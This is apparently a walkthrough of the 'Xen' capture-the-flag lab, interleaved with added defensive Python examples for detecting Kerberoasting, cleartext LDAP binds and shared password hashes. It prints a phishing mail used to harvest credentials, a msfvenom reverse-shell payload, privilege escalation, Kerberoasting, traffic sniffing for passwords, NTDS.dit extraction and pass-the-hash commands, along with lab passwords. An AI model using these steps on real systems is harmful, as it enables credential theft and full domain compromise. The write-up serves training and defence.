SF:ommands\r\n")%r(GetRequest,6F,"220\x20ESMTP\x20MAIL\x20Service\x20ready
SF:\x20\(EXCHANGE\.HTB\.LOCAL\)\r\n503\x20Bad\x20sequence\x20of\x20command
SF:s\r\n503\x20Bad\x20sequence\x20of\x20commands\r\n");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: specialized|general purpose|phone
Running (JUST GUESSING): Microsoft Windows 7|8|Phone|2008|8.1|Vista (91%)
OS CPE: cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1
Aggressive OS guesses: Microsoft Windows Embedded Standard 7 (91%), Microsoft Windows 8.1 Update 1 (91%), Microsoft Windows Phone 7.5 or 8.0 (91%), Microsoft Windows 7 or Windows Server 2008 R2 (90%), Microsoft Windows Server 2008 (90%), Microsoft Windows Server 2008 R2 (90%), Microsoft Windows Server 2008 R2 or Windows 8.1 (90%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (90%), Microsoft Windows 7 (90%), Microsoft Windows 7 Professional or Windows 8 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 8s, deviation: 0s, median: 8s

TRACEROUTE (using port 443/tcp)
HOP RTT      ADDRESS
1   24.00 ms 10.14.14.1
2   24.00 ms humongousretail.com (10.13.38.12)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 60.99 seconds

E:\PENTEST>
It seems we have HTTP and HTTPS on port 80 and 443, and SMTP on 25.
Overview of Web Services
Let's take a quick look at the web pages to see what we have. Port 80 redirected me to port 443, and the certificate presented there gave a new domain name, humongousretail.com.
I didn’t have much to go on, so I decided to do some directory enumeration.
Directory Enumeration
I used wfuzz in this case because gobuster didn't come up with anything useful.
wfuzz --hc 404 -w raft-small-words.txt http://10.13.38.12/FUZZ
Web Directories
We had several other directories that seemed interesting but the ones I wanted to look at are Remote and Jakarta.
Opening https://humongousretail.com/remote, I get the following.
And browsing to https://humongousretail.com/jakarta, I got the following.
I looked at these for some time to see if I could come up with anything useful, digging deeper into the directories and looking for known exploits for the XenApp application. Knowing this environment is called XEN, I concentrated on the remote directory rather than Jakarta. After spending some more time on this, I decided to investigate the SMTP service; in past exercises the users had been very responsive to mail.
SMTP Enumeration
I had the domain name of the company, therefore I decided to see if I could get any email addresses and see if I could somehow get a response from someone.
smtp-user-enum -M RCPT -U ./usernames.txt -D humongousretail.com -t 10.13.38.12
I found 4 addresses:
- sales@humongousretail.com
- it@humongousretail.com
- marketing@humongousretail.com
- legal@humongousretail.com
Now that I had these 4 addresses, I needed to ensure that I could send mail through. I decided to use an internal address to try and get a response from someone.
User Response
To see if I was getting a response, I had a listener running to capture anything that may come through.
nc -nlvp 80
I then attempted a lot of different emails and a lot of different subjects. I eventually got a hit with the subject of Remote. My thought on this was to try and get the users to click on my link. The mail was as follows:
telnet 10.13.38.12 25
helo humongousretail.com
MAIL FROM: it@hunongousretail.com
RCPT TO: sales@humongousretail.com
DATA
Subject: Remote Portal
Hi,
The URL for the remote portal has now been changed to http://10.14.15.106
Regards
IT
QUIT
I chose to do this because a mail from the IT department sent out to a group of people would hopefully get me something. The users should trust an email coming in from IT, or so you would think.
Once the email had been sent, I didn’t get a response, but 30 seconds later, I had some data returned. It was the user clicking on the link to the new portal and providing their credentials.
I had a username of pmorgan and a password of Summer1Summer!. Although I knew that had worked, I tried again to ensure I had it correctly, and had a different user response.
I now had another user. This one being jmendes and password VivaBARC3L0N@!!!.
I kept this up to see if I could get any more responses and I had one more.
The last response I had gave me the user awardel and password @M3m3ntoM0ri@. I now had 3 users:
pmorgan:Summer1Summer!
jmendes:VivaBARC3L0N@!!!
awardel:@M3m3ntoM0ri@
Citrix XenAPP
I had the 3 users and knew that they must work somewhere. I browsed to the remote site and entered the credentials of pmorgan
And I now had access to a desktop.
I tried this for each user that I had, and each of them worked and successfully logged in.
I clicked on the Desktop to access it and was asked to open the launch.ica file, which defaulted to open with the Citrix Receiver Engine after I installed icaclientWeb_19.12.0.19_amd64.deb on Kali.
Once I had clicked OK, I was presented with a Desktop. I browsed to the Desktop of the user and was presented with the 1st flag.
1 – XEN{wh0_n33d5_2f@?} Breach
Gaining a shell
Now that I had access to the desktops, I wanted to get a shell to see if I could elevate my privileges on them. I first made a note of all the users and the desktops they were assigned to.
I created the reverse shell that I wanted so that I could get a meterpreter session.
msfvenom --platform windows -p windows/meterpreter/reverse_tcp LHOST=10.14.15.106 LPORT=10086 -f exe -o x86exploit.exe
I then proceeded to set up my msfconsole as follows.
Now that I had everything setup, I started the SimpleHTTPServer so that I could download the file necessary to exploit the system.
python -m SimpleHTTPServer 80
I then browsed to my machine on the vdesktop and downloaded the file.
I now started the exploit and got a meterpreter shell.
Privilege Escalation on Desktop
Now that I had a meterpreter shell, I wanted to see if I could elevate my privileges. I decided to use the local exploit suggester.
I first put my session to the background and started the suggester.
use post/multi/recon/local_exploit_suggester
Seeing the results from the suggester, I decided on using the always install elevated exploit.
use exploit/windows/local/always_install_elevated
I had successfully raised my privileges. I looked to see what was on the Administrator Desktop, and I had found the second flag.
2 – XEN{7ru573d_1n574ll3r5} Deploy
Further Enumeration
Now that I had a way into the inside of the network, and had seen that the internal network was 172.16.249.0/24, I wanted to perform a quick scan of the network to identify hosts. To pivot within the internal network, I used a socks proxy within msf.
use auxiliary/server/socks4a
Now that I had done this, I wanted to see what hosts were live on the internal network. Knowing the IP’s of the desktops, I chose to only scan a small range. I wanted to scan between 199 and 210.
I managed to get an additional 3 IP’s.
- 172.16.249.200 (DC)
- 172.16.249.201 (Citrix)
- 172.16.249.202 (NetScaler)
Because of this, I decided to use a technique I had used in a previous engagement called Kerberoasting.
With the system shell that I had earlier, I decided to upload the Kerberoasting module.
Further credentials
I now wanted to see if there were any further credentials that I could find
PS C:\Users\pmorgan\Desktop> .\Rubeus.exe kerberoast /outfile:service_ticket.txt

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v1.4.2

[*] Action: Kerberoasting

[*] NOTICE: AES hashes will be returned for AES-enabled accounts.
[*] Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.

[*] Searching the current domain for Kerberoastable users

[*] Found 1 user(s) to Kerberoast!

[*] SamAccountName         : mturner
[*] DistinguishedName      : CN=Mark Turner,OU=Contractors,DC=htb,DC=local
[*] ServicePrincipalName   : MSSQLSvc/CITRIXTEST.HTB.LOCAL:1433
[*] Supported ETypes       : RC4_HMAC_DEFAULT
[*] Hash written to C:\Users\pmorgan\Desktop\service_ticket.txt

[*] Roasted hashes written to : C:\Users\pmorgan\Desktop\service_ticket.txt
PS C:\Users\pmorgan\Desktop> dir

    Directory: C:\Users\pmorgan\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a---         4/4/2020  11:13 AM              7 cmd.bat
-ar--         4/6/2019  11:11 PM             19 flag.txt
-a---        2/20/2020   6:53 PM          41534 Invoke-Portscan.ps1
-a---        3/26/2020  10:56 AM       16128568 netscan64.exe
-a---         4/6/2020   8:57 PM            295 netscan64.lic
-a---         4/6/2020   8:57 PM          39301 netscan64.xml
-a---        2/20/2020   6:30 PM         770279 powerview-dev.ps1
-a---        9/22/2019  10:20 AM         883600 putty.exe
-a---       11/27/2019   2:17 PM         198144 Rubeus.exe
-a---         4/6/2020   9:12 PM           2172 service_ticket.txt
-a---        3/28/2020  11:17 AM         832512 SharpHound.exe
-a---        3/28/2020  11:17 AM         973323 SharpHound.ps1
-a---         4/6/2020   8:59 PM          32665 winPEAS.bat
-a---         4/6/2020   8:59 PM         241152 winPEAS.exe

[to get a proper command prompt we use]
PS C:\Users\pmorgan\Desktop> type cmd.cmd
cmd.exe
PS C:\Users\pmorgan\Desktop> type service_ticket.txt
$krb5tgs$23$*mturner$htb.local$MSSQLSvc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sers\pmorgan\Desktop> copy "\\Client\D$\SharpHound.ps1" .
PS C:\Users\pmorgan\Desktop> Set-ExecutionPolicy -Scope CurrentUser
PS C:\Users\pmorgan\Desktop> Bypass
PS C:\Users\pmorgan\Desktop> .\Sharphound
PS C:\Users\pmorgan\Desktop> Import-Module .\SharpHound.ps1
PS C:\Users\pmorgan\Desktop> get-help Invoke-BloodHound
PS C:\Users\pmorgan\Desktop> Invoke-BloodHound -CollectionMethod All
PS C:\Users\pmorgan\Desktop> copy .\service_ticket.txt \\Client\D$\
PS C:\Users\pmorgan\Desktop> copy "\\Client\D$\netscan64.exe" .
PS C:\Users\pmorgan\Desktop>
PS C:\Users\pmorgan\Desktop> Import-Module .\powerview-dev.ps1
PS C:\Users\pmorgan\Desktop> Get-NetUser
PS C:\Users\pmorgan\Desktop> Get-NetUser | Ft samAccountName
I copied the contents of this token to a file named mturner so that I could now run this through hashcat.
I exhausted all password lists that I had with this and decided to look up some hashcat rules online to see what I could come up with. I eventually came up with a ruleset that had potential, which was found at https://github.com/NSAKEY/nsa-rules.git.
hashcat -m 13100 ./mturner rockyou.txt -r rules/_NSAKEY.v2.dive.rule --debug-mode=1 --debug-file=matched.rule --force -O
After several hours, I eventually got a hit on the password.
We now know that the password for mturner is 4install!
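Kerberoasting leaves a distinct trace on the domain controller: a successful TGS request (Security event 4769) for a user account's SPN with RC4 encryption (TicketEncryptionType 0x17), the same RC4_HMAC ticket Rubeus reported for mturner above, and a scripted roast requests such tickets for every roastable SPN from one client within seconds. The example below is added here and is not the write-up author's code; it runs that rule over a constructed key=value export of 4769 events (the export format, the svc-report account and the client addresses are assumptions, not lab data) and also reports clients whose RC4 requests span several distinct service accounts.

```python
"""Flag Kerberoasting candidates in Security event 4769 (TGS request) records.

Added example, not from the write-up. The record format is a constructed
flattened key=value export, not the exact XML a domain controller emits.
"""
from collections import defaultdict

RC4_HMAC = "0x17"   # TicketEncryptionType of an RC4 ticket, the offline-crackable kind
SUCCESS = "0x0"     # Status of a ticket that was actually issued

# Constructed sample export: event id, time, then the 4769 fields that matter.
# svc-report and the 172.16.249.20x client addresses are assumptions.
SAMPLE_4769 = """\
4769 2020-04-06T21:10:01Z TargetUserName=pmorgan@HTB.LOCAL ServiceName=CITRIXTEST$ TicketEncryptionType=0x12 IpAddress=::ffff:172.16.249.205 Status=0x0
4769 2020-04-06T21:12:14Z TargetUserName=pmorgan@HTB.LOCAL ServiceName=mturner TicketEncryptionType=0x17 IpAddress=::ffff:172.16.249.205 Status=0x0
4769 2020-04-06T21:12:14Z TargetUserName=pmorgan@HTB.LOCAL ServiceName=svc-report TicketEncryptionType=0x17 IpAddress=::ffff:172.16.249.205 Status=0x0
4769 2020-04-06T21:12:15Z TargetUserName=pmorgan@HTB.LOCAL ServiceName=krbtgt TicketEncryptionType=0x12 IpAddress=::ffff:172.16.249.205 Status=0x0
4769 2020-04-06T21:13:02Z TargetUserName=jmendes@HTB.LOCAL ServiceName=mturner TicketEncryptionType=0x17 IpAddress=::ffff:172.16.249.207 Status=0xd
"""


def parse_4769(line):
    """Turn one export line into a dict, or None if it is not a 4769 record."""
    parts = line.split()
    if len(parts) < 3 or parts[0] != "4769":
        return None
    rec = {"time": parts[1]}
    for kv in parts[2:]:
        key, _, value = kv.partition("=")
        rec[key] = value
    return rec


def is_roast_candidate(rec):
    """Issued RC4 ticket for a user-held SPN (computer accounts end in $, krbtgt is the TGT)."""
    svc = rec.get("ServiceName", "")
    return (rec.get("Status") == SUCCESS
            and rec.get("TicketEncryptionType") == RC4_HMAC
            and not svc.endswith("$")
            and svc.lower() != "krbtgt")


def kerberoast_findings(export):
    """Return [(client_ip, requesting_user, service_account)] for each candidate event."""
    findings = []
    for line in export.splitlines():
        rec = parse_4769(line)
        if rec and is_roast_candidate(rec):
            ip = rec.get("IpAddress", "").removeprefix("::ffff:")
            findings.append((ip, rec["TargetUserName"], rec["ServiceName"]))
    return findings


def roasting_clients(export, min_services=2):
    """Clients whose RC4 TGS requests cover at least min_services distinct service accounts."""
    per_client = defaultdict(set)
    for ip, _requester, service in kerberoast_findings(export):
        per_client[ip].add(service)
    return {ip: svcs for ip, svcs in per_client.items() if len(svcs) >= min_services}


if __name__ == "__main__":
    for ip, who, svc in kerberoast_findings(SAMPLE_4769):
        print(f"RC4 TGS for user SPN account {svc} requested by {who} from {ip}")
    for ip, svcs in roasting_clients(SAMPLE_4769).items():
        print(f"possible Kerberoast sweep from {ip}: {sorted(svcs)}")
```

The per-client aggregation is what separates a roast from a legitimate RC4 ticket for one old application. The condition the rule detects is fixed on the account side: a long random password or a group managed service account for the SPN holder, and enabling AES on it so the KDC stops issuing RC4 tickets for that SPN.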
SMB Access
Now that I had the new credentials, I looked about a little more to see what else I could find. I eventually found SMB on 172.16.249.201 and decided to use the credentials found to see if I could see anything.
proxychains smbmap -u mturner -p '4install!' -d htb.local -H 172.16.249.201
This showed that we had read access to the files located in the Citrix$ share. I connected to it to see what was inside with smbclient.
proxychains smbclient \\\\172.16.249.201\\Citrix$ -U htb.local\\mturner
I was provided with some interesting files. The 2 of interest at this point are flag.txt and private.ppk.
I downloaded these files and was able to read the next flag.
3 – XEN{l364cy_5pn5_ftw} Ghost
Putty file Conversion
Now that I had a putty private key file, I had a look at its contents to see if I could get a hint at anything.
It seems this could be used in putty but has a password on it too. I needed to try and crack the password on this before I could proceed. I decided to convert this with putty2john.
putty2john private.ppk > private.hash
Now that I had this file in a readable format for john, I tried to crack the password.
After several hours, all my password lists came up empty. I was unable to crack the password with what I had. I decided to look elsewhere to see what I could potentially use as a password list generator. I found a password generator that seemed interesting and decided to run with it. I found this at https://github.com/hashcat/kwprocessor
./kwp -o passes basechars/tiny.base keymaps/en-gb.keymap routes/2-to-32-max-5-directionchanges.route
Once I had the password list generated, I then had to put it through john to try and crack it again.
john -w=./passes private.hash
Now that I knew the password for the file, I could convert the file for use with my system. To do this, I used puttygen.
puttygen private.ppk -O private-openssh -o id_rsa
I now had a key file that I could use.
Access to NetScaler
During the time gathering information, I had accumulated many user IDs and I tried all of them with the private key to get onto the SSH of the NetScaler. I then quickly found that the default username of the devices is nsroot, and attempted to log in with this user ID.
proxychains ssh -i id_rsa nsroot@172.16.249.202
Now that I had access to the NetScaler as root of the device, I hunted around to see if I could find anything. After a while of searching, I did not come up with anything useful. Remembering that the device is essentially a firewall and router, I decided to listen to the traffic passing through the device and remembered a specific article at https://hackertarget.com/tcpdump-examples/.
I attempted this to see if I would get any results.
tcpdump -s 0 -A -n -l | egrep -i "POST /|pwd=|passwd=|password=|Host:"
4 – XEN{bu7_ld4p5_15_4_h455l3} Camouflage
LDAP
Knowing that I had access to this box as root, I wanted to perform some additional tests to see what other traffic was being passed through it. The previous flag seemed to suggest LDAP could be in use. I set up a tcpdump capture for this.
tcpdump -w capture.pcap
I now had to transfer the file back to my machine for investigation. I used scp for this.
proxychains scp -i id_rsa nsroot@172.16.249.202:/root/capture.pcap .
I then opened this file within Wireshark to see what I could find.
Now going from the previous hint, I searched for the LDAP traffic and found a password.
The password that I had found was #S3rvice#@cc which was for the netscaler-svc account.
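What made this possible is the LDAP simple bind: the client sends its password as a plain OCTET STRING inside the BER-encoded BindRequest, so anyone on the path (here, root on the NetScaler the traffic transits) can read it, while a SASL/GSS-SPNEGO bind carries only Kerberos or NTLM tokens. The example below is added here and is not the write-up author's code; it builds a constructed TCP/389 stream (the bind name netscaler-svc@htb.local and the placeholder secret are assumptions, not the captured values), walks the LDAPMessages per RFC 4511, and flags every simple bind by reporting who bound and how many secret bytes crossed the wire, without keeping the secret itself.

```python
"""Flag LDAP simple (cleartext) binds in TCP/389 payloads taken from a capture.

Added example, not code from the write-up. The bind name and secret below are
constructed stand-ins; the BER layout follows RFC 4511 BindRequest.
"""
from __future__ import annotations
from dataclasses import dataclass

LDAP_MESSAGE = 0x30   # SEQUENCE wrapping every LDAPMessage
BIND_REQUEST = 0x60   # [APPLICATION 0] BindRequest
AUTH_SIMPLE = 0x80    # AuthenticationChoice simple [0]: the password as an OCTET STRING
AUTH_SASL = 0xA3      # AuthenticationChoice sasl [3]: mechanism + credentials SEQUENCE


def _tlv(tag: int, value: bytes) -> bytes:
    """Encode one BER TLV with a definite (short or long form) length."""
    n = len(value)
    if n < 0x80:
        return bytes([tag, n]) + value
    lb = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(lb)]) + lb + value


def _read_tlv(buf: bytes, off: int) -> tuple[int, bytes, int]:
    """Decode the TLV at buf[off]; return (tag, value, offset just past it)."""
    tag, length = buf[off], buf[off + 1]
    off += 2
    if length & 0x80:                      # long form: low 7 bits = count of length octets
        n = length & 0x7F
        length = int.from_bytes(buf[off:off + n], "big")
        off += n
    return tag, buf[off:off + length], off + length


def build_simple_bind(msg_id: int, name: str, password: str) -> bytes:
    """Construct a BindRequest with simple authentication (sample input only)."""
    op = _tlv(0x02, b"\x03") + _tlv(0x04, name.encode()) + _tlv(AUTH_SIMPLE, password.encode())
    return _tlv(LDAP_MESSAGE, _tlv(0x02, bytes([msg_id])) + _tlv(BIND_REQUEST, op))


def build_sasl_bind(msg_id: int, mechanism: str, token: bytes) -> bytes:
    """Construct a BindRequest with SASL authentication (sample input only)."""
    sasl = _tlv(0x04, mechanism.encode()) + _tlv(0x04, token)
    op = _tlv(0x02, b"\x03") + _tlv(0x04, b"") + _tlv(AUTH_SASL, sasl)
    return _tlv(LDAP_MESSAGE, _tlv(0x02, bytes([msg_id])) + _tlv(BIND_REQUEST, op))


@dataclass
class BindObservation:
    message_id: int
    bind_dn: str
    auth: str         # "simple", "sasl" or "other"
    secret_len: int   # bytes of credential material seen; the value itself is never kept


def parse_bind_requests(payload: bytes) -> list[BindObservation]:
    """Walk the LDAPMessages in a reassembled TCP stream and collect the BindRequests."""
    found, off = [], 0
    while off + 2 <= len(payload):
        tag, msg, off = _read_tlv(payload, off)
        if tag != LDAP_MESSAGE:
            break
        _, mid, pos = _read_tlv(msg, 0)            # messageID INTEGER
        op_tag, op, _ = _read_tlv(msg, pos)        # protocolOp
        if op_tag != BIND_REQUEST:
            continue
        _, _version, pos = _read_tlv(op, 0)        # version INTEGER
        _, name, pos = _read_tlv(op, pos)          # name LDAPDN
        auth_tag, cred, _ = _read_tlv(op, pos)     # authentication CHOICE
        if auth_tag == AUTH_SIMPLE:
            auth = "simple"
        elif auth_tag == AUTH_SASL:
            auth = "sasl"
        else:
            auth = "other"
        found.append(BindObservation(int.from_bytes(mid, "big"),
                                     name.decode(errors="replace"), auth, len(cred)))
    return found


def cleartext_bind_alerts(payload: bytes, client_ip: str, server_port: int = 389) -> list[str]:
    """One alert per simple bind on plain LDAP; LDAPS (636) carries TLS, not raw BER."""
    if server_port != 389:
        return []
    return [f"cleartext LDAP simple bind from {client_ip} as '{o.bind_dn}' "
            f"({o.secret_len}-byte password on the wire, msg {o.message_id})"
            for o in parse_bind_requests(payload) if o.auth == "simple"]


# Constructed sample stream: one simple bind (the exposure), then a SASL/GSS-SPNEGO bind.
SAMPLE_TCP_389 = (build_simple_bind(1, "netscaler-svc@htb.local", "<constructed-secret>")
                  + build_sasl_bind(2, "GSS-SPNEGO", b"\x60" + bytes(40)))

if __name__ == "__main__":
    for alert in cleartext_bind_alerts(SAMPLE_TCP_389, "172.16.249.202"):
        print(alert)
```

Feed it the reassembled client-to-server payload of each TCP/389 stream from a capture like the one above, and every appliance or application still doing simple binds over plain LDAP shows up by name. The domain controller can report the same thing without a capture: Directory Service event 2889 lists clients that bind without signing or with simple auth once LDAP interface diagnostics are raised, and the fix is LDAPS or LDAP signing for those clients, with a password change for any account that has already bound in the clear.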
msf > use auxiliary/server/socks4a
msf > set srvport 8888
msf > route add 172.16.249.0 255.255.255.0 1
msf exploit
root@kali:~/htb/xen# proxychains GetUserSPNs.py -request -dc-ip 172.16.249.200 HTB.LOCAL/netscaler-svc:#S3rvice#@cc
ProxyChains-3.1 (http://proxychains.sf.net)
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

|S-chain|-<>-127.0.0.1:8888-<><>-172.16.249.200:389-<><>-OK
ServicePrincipalName                Name     MemberOf                                 PasswordLastSet             LastLogon
----------------------------------  -------  ---------------------------------------  --------------------------  --------------------------
MSSQLSvc/CITRIXTEST.HTB.LOCAL:1433  mturner  CN=Deployment,OU=Groups,DC=htb,DC=local  2019-02-13 23:23:48.796612  2019-04-10 22:14:57.105936

|S-chain|-<>-127.0.0.1:8888-<><>-172.16.249.200:88-<><>-OK
|S-chain|-<>-127.0.0.1:8888-<><>-172.16.249.200:88-<><>-OK
|S-chain|-<>-127.0.0.1:8888-<><>-172.16.249.200:88-<><>-OK
$krb5tgs$23$*mturner$HTB.LOCAL$MSSQLSvc/CITRIXTEST.HTB.LOCAL~1433*$30e2233e1b0123f3c7579d9f7a2384fb$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
root@kali:~/xen# proxychains smbmap -u mturner -p '4install!' -d htb.local -H 172.16.249.201
ProxyChains-3.1 (http://proxychains.sf.net)
[+] Finding open SMB ports....
|S-chain|-<>-127.0.0.1:1080-<><>-172.16.249.201:445-<><>-OK
|S-chain|-<>-127.0.0.1:1080-<><>-172.16.249.201:445-<><>-OK
|S-chain|-<>-127.0.0.1:1080-<><>-172.16.249.201:445-<><>-OK
[+] User SMB session establishd on 172.16.249.201...
[+] IP: 172.16.249.201:445      Name: 172.16.249.201
        Disk                        Permissions
        ----                        -----------
        ADMIN$                      NO ACCESS
        C$                          NO ACCESS
        Citrix$                     READ ONLY
        IPC$                        NO ACCESS
        ISOs                        NO ACCESS
        ISOs-TEST                   NO ACCESS
root@kali:~/xen#
root@kali:~/xen# proxychains smbclient \\\\172.16.249.201\\Citrix$ -U htb.local\\mturner
ProxyChains-3.1 (http://proxychains.sf.net)
WARNING: The "syslog" option is deprecated
|S-chain|-<>-127.0.0.1:1080-<><>-172.16.249.201:445-<><>-OK
Enter HTB.LOCAL\mturner's password: 4install!
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed May  8 18:12:51 2019
  ..                                  D        0  Wed May  8 18:12:51 2019
  Deploying-XenServer-5.6.pdf         A   997001  Tue Feb 12 18:21:10 2019
  flag.txt                           AR       20  Sun Mar 31 11:25:10 2019
  private.ppk                         A     1486  Wed May  8 18:21:51 2019
  XenServer-5-6-SHG.pdf               A  1747587  Tue Feb 12 18:21:32 2019

                10485247 blocks of size 4096. 6344443 blocks available
Doppelganger
The term doppelganger is a non-biologically related look-alike (Wikipedia). This provided me with the hint of looking back at the other accounts that were active on the domain. I immediately got access to a shell again on the desktop and looked up domain details.
I was looking for what was hopefully an account that may seem to be like the found netscaler-svc account.
After all, I had tried this account in so many different places to access different resources and none were successful.
net user /domain
After a few attempts at usernames, I discovered that backup-svc had the same password as the NetScaler account; these essentially shared the same password. This was our doppelganger. I then tried to log in to the Domain Controller using WinRM and proxychains to see if I could get access, because I knew it was a member of the Backup Operators group, which generally has access.
proxychains ruby winrm_shell_with_upload.rb
root@kali:~/xen# proxychains ruby winrmshell2withupload.rb
ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-127.0.0.1:1080-<><>-172.16.249.200:5985-<><>-OK
PS htb\backup-svc@DC Documents>
PS htb\backup-svc@DC Desktop> type flag.txt
XEN{y_5h4r3d_p@55w0Rd5?}
PS htb\backup-svc@DC Desktop>
I looked on the Desktop of backup-svc and found the next flag.
5 – XEN{y_5h4r3d_p@55w0Rd5?} Doppelganger
Privileges
Now that I was on the box, I wanted to see what privileges I had, to understand what else could be achieved by simply logging in through WinRM.
whoami /priv
This was sure interesting. It seems I had a few privileges including the Backup and Restore. This seemed obvious though with the account being named backup-svc.
I first tried to access the Administrator Desktop and was denied access.
From this I knew something had to be done with backup privileges. I had recently done an exercise in the office that I work in on retrieving the Active Directory Database to extract the hashes. This is something that I do on a regular basis and therefore knew I would have to create a shadow copy of the drive to even attempt to gain access to the NTDS.
I looked at all the usual methods of creating a shadow copy, including vssadmin and wbadmin. However, I then found an article which covered doing this with diskshadow. This was highlighted in the following document: https://github.com/decoder-it/whoami-priv-Hackinparis2019/blob/master/whoamiprivParis_Split.pdf. I wanted to try and get RDP access to the machine and therefore set up a portfwd to give me access.
portfwd add -l 3389 -r 172.16.249.200 -p 3389
I then tried to open an RDP session to the machine using remmina.
I decided to utilise this to give myself hopefully a little more access, using proxychains xfreerdp instead of remmina.
Install freerdp-x11
sudo apt-get install freerdp-x11
root@kali:~# proxychains xfreerdp /v:172.16.249.200 /u:backup-svc
ProxyChains-3.1 (http://proxychains.sf.net)
[03:37:43:732] [6460:6461] [INFO][com.freerdp.client.common.cmdline] - loading channelEx cliprdr
|S-chain|-<>-127.0.0.1:1080-<><>-172.16.249.200:3389-<><>-OK
Password: #S3rvice#@cc
[03:37:58:008] [6460:6461] [INFO][com.freerdp.gdi] - Local framebuffer format  PIXEL_FORMAT_BGRX32
[03:37:58:008] [6460:6461] [INFO][com.freerdp.gdi] - Remote framebuffer format PIXEL_FORMAT_RGB16
[03:37:58:120] [6460:6461] [INFO][com.winpr.clipboard] - initialized POSIX local file subsystem
And I was given the RDP access I was looking for.
I now decided to run through diskshadow to see if I could create a shadow of the drive.
Shadow Copies
diskshadow
set context persistent nowriters
add volume c: alias dmwong
create
expose %dmwong% z:
Once I had created the backup, I restored the files from it by importing the modules found at https://github.com/giuliano108/SeBackupPrivilege/tree/master/SeBackupPrivilegeCmdLets/bin/Debug.
I opened PowerShell and imported the 2 modules.
Copy-FileSeBackupPrivilege z:\Windows\NTDS\ntds.dit c:\temp\ndts.dit
reg save hklm\system c:\temp\system.bak
Now that I had access to these files, I continued to download them onto my system for offline cracking.
Domain Admin
Now that I had these files offline, I needed to extract the hashes.
python /opt/impacket/examples/secretsdump.py -ntds ndts.dit -system system.bak LOCAL
This provided me with all the hashes from the Active Directory Database. Now that I had all of these hashes, I decided to use the ‘Pass the Hash’ method to try and gain access to the Domain controller as Administrator.
proxychains python /opt/impacket/examples/wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:822601ccd7155f47cd955b94af1558be Administrator@172.16.249.200
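The Doppelganger stage turned on two accounts, netscaler-svc and backup-svc, sharing one password, and the secretsdump output produced here is exactly the data a defender can audit for that condition: accounts with the same password have the same NT hash, so a dump of the NTDS taken during an authorised review reveals every such pair without cracking anything. The example below is added here and is not the write-up author's code; it parses lines in secretsdump's domain\user:rid:lmhash:nthash::: format and groups accounts by identical NT hash. The sample dump, its RIDs and its hash values are constructed placeholders, not the lab's hashes; only the well-known empty LM and NT hashes are real constants.

```python
"""Audit a secretsdump-style NTDS export for accounts that share a password.

Added example, not from the write-up. All sample hashes below are constructed
placeholders except the two well-known empty-password constants.
"""
from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM hash of the empty string (LM storage off)
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of the empty string (blank password)

# Constructed sample in secretsdump.py's domain\user:rid:lmhash:nthash::: format.
SAMPLE_NTDS = """\
[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)
htb.local\\Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
htb.local\\Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\\krbtgt:502:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210:::
htb.local\\netscaler-svc:1106:aad3b435b51404eeaad3b435b51404ee:aaaabbbbccccddddeeeeffff00001111:::
htb.local\\backup-svc:1107:aad3b435b51404eeaad3b435b51404ee:aaaabbbbccccddddeeeeffff00001111:::
htb.local\\pmorgan:1108:aad3b435b51404eeaad3b435b51404ee:2222333344445555666677778888999a:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:99998888777766665555444433332222:::
"""


def parse_secretsdump(text):
    """Yield (account, rid, lm, nt) per hash line; banner and Kerberos-key lines are skipped."""
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            continue
        yield parts[0], int(parts[1]), parts[2].lower(), parts[3].lower()


def shared_password_groups(text, include_computers=False):
    """Return {nt_hash: sorted accounts} for every NT hash held by more than one account."""
    by_hash = defaultdict(set)
    for account, _rid, _lm, nt in parse_secretsdump(text):
        if nt == EMPTY_NT:          # blank passwords are reported separately, not as sharing
            continue
        if account.endswith("$") and not include_computers:
            continue                # machine accounts have random passwords; noise here
        by_hash[nt].add(account)
    return {h: sorted(accts) for h, accts in by_hash.items() if len(accts) > 1}


def weak_storage_findings(text):
    """(accounts with a populated LM hash, accounts with a blank NT hash)."""
    lm_enabled, blank = [], []
    for account, _rid, lm, nt in parse_secretsdump(text):
        if lm != EMPTY_LM:
            lm_enabled.append(account)
        if nt == EMPTY_NT:
            blank.append(account)
    return sorted(lm_enabled), sorted(blank)


if __name__ == "__main__":
    for nt, accts in shared_password_groups(SAMPLE_NTDS).items():
        print(f"shared password ({nt[:8]}...): {', '.join(accts)}")
    lm, blank = weak_storage_findings(SAMPLE_NTDS)
    print(f"LM hash stored: {lm or 'none'}; blank password: {blank or 'none'}")
```

Run against a real export, the shared-hash groups are the direct counterpart of the flag text on this box: a service account whose password is exposed to the network (here through a cleartext LDAP bind) sharing it with a member of Backup Operators is what turned a captured credential into domain admin. Each group is a password change plus, for the privileged member, a check of why it shares anything with a low-trust account.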
6 – XEN{d3r1v471v3_d0m41n_4dm1n} Owned
